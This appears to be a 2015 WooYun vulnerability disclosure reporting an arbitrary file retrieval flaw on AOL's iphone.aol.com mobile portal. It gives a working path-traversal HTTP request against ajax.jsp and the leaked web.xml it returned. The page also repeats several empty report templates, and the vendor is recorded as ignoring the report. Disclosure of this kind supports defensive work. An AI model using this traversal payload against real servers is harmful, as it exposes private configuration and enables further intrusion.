arbitrary file retrieval of an aol`s website | wooyun-2015-0103734

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0103734

漏洞标题：

arbitrary file retrieval of an aol`s website

漏洞详情

披露状态：

2015-03-25：细节已通知厂商并且等待厂商处理中
2015-03-30：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

mobile portal of aol --iphone.aol.com
proof of concept:

GET /ajax.jsp?m=..%2f..%2fWEB-INF%2fweb.xml%3bx%3d&p=dynamicleadslide&vbclass=vid_over&ajax=1&sitHot=null&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config&dlItem=633100&dlug=false&cv=6&_c=main5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) 
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: iphone.aol.com
Accept-Encoding: gzip, deflate

web.xml retrieved:

HTTP/1.1 200 OK
Date: Wed, 22 Mar 2015  
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=iphone.aol.com
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
ModPagespeedDisableFilters: rewrite_javascript,inline_css
ModPagespeed: on
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 3506
Set-Cookie: JSESSIONID=16DABAA250AA22B57E02F9BAE2D18EC7; Path=/aol
Content-Length: 3506
<?xml version="1.0" encoding="UTF-8"?>
<web-app id="WebApp_ID" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
    <display-name>portal5</display-name>
    <listener>
        <listener-class>
            com.aol.pubt.forc.util.ContextListener
        </listener-class>
    </listener>
    <listener>
      <listener-class>
         net.sourceforge.wurfl.core.web.WURFLServletContextListener
      </listener-class>
    </listener>       
    <listener>
        <listener-class>
			com.aol.portals.core.ContextListener
        </listener-class>
    </listener> 
    <context-param>
        <param-name>wurfl</param-name>
        <param-value>/data/servers/portal_fe_wurfl/wurfl.zip</param-value>     
    </context-param>
    <context-param>
        <param-name>wurflPatch</param-name>
        <param-value>/data/servers/portal_fe_wurfl/wurfl_patch.xml</param-value>
    </context-param> 
    <filter>
        <filter-name>VL6Filter</filter-name>
        <filter-class>com.aol.portals.core.utils.VL6Filter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>VL6Filter</filter-name>
        <url-pattern>/*</url-pattern>
        <dispatcher>FORWARD</dispatcher>
    </filter-mapping>
    <filter>
        <filter-name>CMSFEPreviewFilter</filter-name>
        <filter-class>com.aol.pubt.dynapubcms.CMSFEPreviewFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>CMSFEPreviewFilter</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
    <filter>
        <filter-name>DataLayerTracking</filter-name>
        <filter-class>com.aol.portals.aol.TrackingModuleDataFilter</filter-class>
    </filter>
.......
.......
.....

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-03-30 19:52

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云